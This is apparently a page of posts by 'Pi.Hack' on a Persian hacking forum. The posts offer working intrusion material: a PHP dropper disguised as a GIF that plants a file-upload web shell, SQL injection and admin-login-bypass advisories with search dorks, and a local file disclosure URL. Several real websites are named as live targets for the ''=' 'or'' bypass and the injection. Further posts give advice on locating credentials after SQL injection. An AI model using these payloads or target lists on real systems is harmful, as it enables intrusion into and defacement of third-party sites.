Pi.Hack

در ادامه صحبت 0xD0ctor عزیز میتونید از قطعه کد زیر برای اپلود فایل در هر دایرکتوری استفاده کنید GIF89a1 <?php $fp = fopen("../../pi.php","w"); $code='<?php if (isset($_FILES["userfile"])) { $dir=$_POST["dir"]; if($dir == "" || !isset($dir)) $dir=getcwd(); $uploadfile=$dir."/".basename($_FILES["userfile"]["name"]); if (move_uploaded_file($_FILES["userfile"]["tmp_name"],$uploadfile)) { echo "Uploaded: ". "Name: ".$_FILES["userfile"]["name"]."<br>\n". "Type: ".$_FILES["userfile"]["type"]."<br>\n". "Size: ".$_FILES["userfile"]["size"]." bytes<br>\n"; } else print "Error uploading file: ".$_FILES["userfile"]["name"].""; echo "<hr>"; } ?> <form enctype="multipart/form-data" method="POST"> Upload New File <input type="file" name="userfile"/> <input type="submit" value="Upload"/> <br><br> </form>'; if($fp){ fwrite($fp,$code); } fclose($fp); remotup.rar

سلام لطفا مطالبتون رو در تایپیک مربوطه بزارین و تایپیک جدید باز نکنین بخش مربوط به تارگت های تمرینی : https://iran-cyber.net/forums/topic/6-target-trainings/page/61

https://cxsecurity.com/issue/WLB-2020070149 # Title: indowebhub Cms Sql Injection # Author: Iran Cyber Security Group # date: 2020-07-28 # Vendor Homepage: https://indowebhub.com # Tested on: Windows # Category : Web Application Bugs # Discovered by : Pi.hack # Dork : "Powered By www.indowebhub.com" & "Created by Indowebhub" ------------------------------------------------------------------------------ # Proof : Search Dorks And Select A Target # Demo : http://www.manalitourismonline.com/honeymoon_package_detail.php?honeymoon_id=3' http://www.tipsedu.in/nursing.php?categories_id=3' # Admin Page : site.com/admin or Site.com/cms ------------------------------------------------------------------------------ # Offecial Website: https://iran-cyber.net

سلام دوستان اولا که قبل شروع یک تایپیک سرچ کنید که جوابتونو بگیرین یک تایپیک دیگ در همین موضوع بود که همین سوال شمارو مطرح کردن و دوستان تا جایی کمک کردن https://iran-cyber.net/forums/threads/%D9%87%D9%80%D9%80%DA%A9-%DA%86%D8%AA%D8%B1%D9%88%D9%85.3870/ طبق چیزی که بنده اطلاع دارم خیلی وقته چت روم ها امنیت رو بالا بردن به نظرم باگ پابلیک خطرناکی وجود نداره بهترین کار دانلود اسکریپت چت روم هست و این که خودتون با علم برنامه نویسی که دارین دنبال آسیب بگردین

سلام دوست عزیز اگر منظورتون افزونه مشابه هست Tamper Data , Burp Suite

سلام دوست عزیز چند دلیل میتونه داشته باشه اولا که بعضی وقتا ادمین سایت میاد یک تیبل تقلبی میسازه که نفوذ گر رو گمراه کنه و ممکنه یوز پس داخل یک ستون دیگری باشه که حتی اسم ستون هم نشون دهنده وجود یوزر و پسورد نباشه دوما که بعضی سایت ها ممکنه دچاره مشکل شده باشن و سایت به دیتابیس وصل نباشه قسمت ادمین پیج و باز هم لاگین نکنه دنبال یوزر و پسورد داخل سایر ستون ها بگردید یا اطمینان حاصل کنید که اطلاعات به دست اوردتونو درست وارد میکنین حتی ممکنه یک لاگین پیج فیک هم وجود داشته باشه و شما اون رو پیدا کرده باشین با اطمینان نمیشه گفت اگر ممکنه تارگت رو بزارین که دقیق تر برسی بشه

دوست عزیز لطفا مطالب رو خودتون زحمت بکشین و کپی نکنید و در صورت کپی منبع را ذکر کنید دفه بعد اخطار دریافت خواهید کرد

دوست عزیز لطفا مطالب رو خودتون زحمت بکشین و کپی نکنید و در صورت کپی منبع را ذکر کنید دفه بعد اخطار دریافت خواهید کرد

دوست عزیز میتونین از این آموزش استفاده کنین No back connect - root.zip

LFD http://www.verdanttelemetry.com/download_file.php?fname=../lib/conmanager.php

https://cxsecurity.com/issue/WLB-2017100100 ########################### # Exploit Title: TravelHungama Cms Admin Login Bypass # Google Dork: Powered By: TravelHungama # Date: 2017/10/12 # Exploit Author: Iran Cyber Security Group # Vendor Homepage: http://www.travelhungama.com/ # Version: All Version # Tested on: Win # CVE : N/A ########################### # Exploit : # Search Google Dork And Select A Target # Admin Page : site.com/admin # Username & Password : '=' 'or' # Enjoy ########################### #Discovered by : Iran Cyber Security Group ###########################

http://www.house2homeuk.com/admin/login.php http://www.accordeng.com/admin/ http://www.event1inc.net/caffeine/ https://www.otakunews.com/admin/ http://www.ardmoreconventioncenter.com/caffeine User & Pass '=' 'or'